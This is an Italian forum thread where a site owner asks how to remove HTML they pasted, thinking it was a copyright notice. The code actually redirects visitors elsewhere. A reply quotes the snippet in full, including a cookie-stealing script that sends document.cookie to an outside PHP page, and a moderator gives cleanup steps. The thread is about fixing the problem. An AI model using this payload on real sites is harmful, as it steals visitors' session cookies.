Visualizzazione risultati 1 fino 3 di 3

Discussione: Inserito pezzo di js che effettua redirect, come lo tolgo? [era: Problema tecnico]

Guest

Predefinito Inserito pezzo di js che effettua redirect, come lo tolgo? [era: Problema tecnico]

Allora, il mio problema è molto semplice, ho messo l'html pensando servisse per il copyright ed invece quando apro il mio sito mi scrive su un alert che è vulnerabile a XSS. A quel punto la pagina viene indirizzata su www.sitoredirect.it.
    Non potendo entrare per eliminare il problema ho provato a modificare l'html nella sezione:"Gestione file", ma con poco successo visto che solo lo Staff di Altervista può modificarne il contenuto.
    Qualche dritta su come risolvere il problema?

L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese

Predefinito

Per entrare nella pagina senza noie basta disabilitare gli script
    e lì vedo:
    Codice HTML:
    Creare redirect :<br />
    	Codice: Seleziona tutto<br />
    	<script>location='http://www.sitoredirect.it;</script>/code]<br />
    	Ogni utente che visualizzer&agrave; la pagina verr&agrave; portato nel sito che avete scelto.</p>
    <p>
    	Rubare cookie :<br />
    	[code]<script>document.location='http://www.sitoredirect.it/leggo-cookie.php?'+document.cookie</script></p>
    -
    Cioè, un aborto inconcepibile e senza senso
    Ultima modifica di darkwolf : 03-12-2012 alle ore 01.39.11

L'avatar di dreadnaut
    dreadnaut non è connesso Super Moderatore

Predefinito

Basta anche premere Esc due o tre volte, per terminare l'esecuzione del js fastidioso. Che saggiamente è stato inserito in tutte le pagine

Togliendo quei pezzi via gestione file almeno in una pagina dovresti però essere in grado di "riattivarla" ed eliminare lo spezzone html con AlterPages.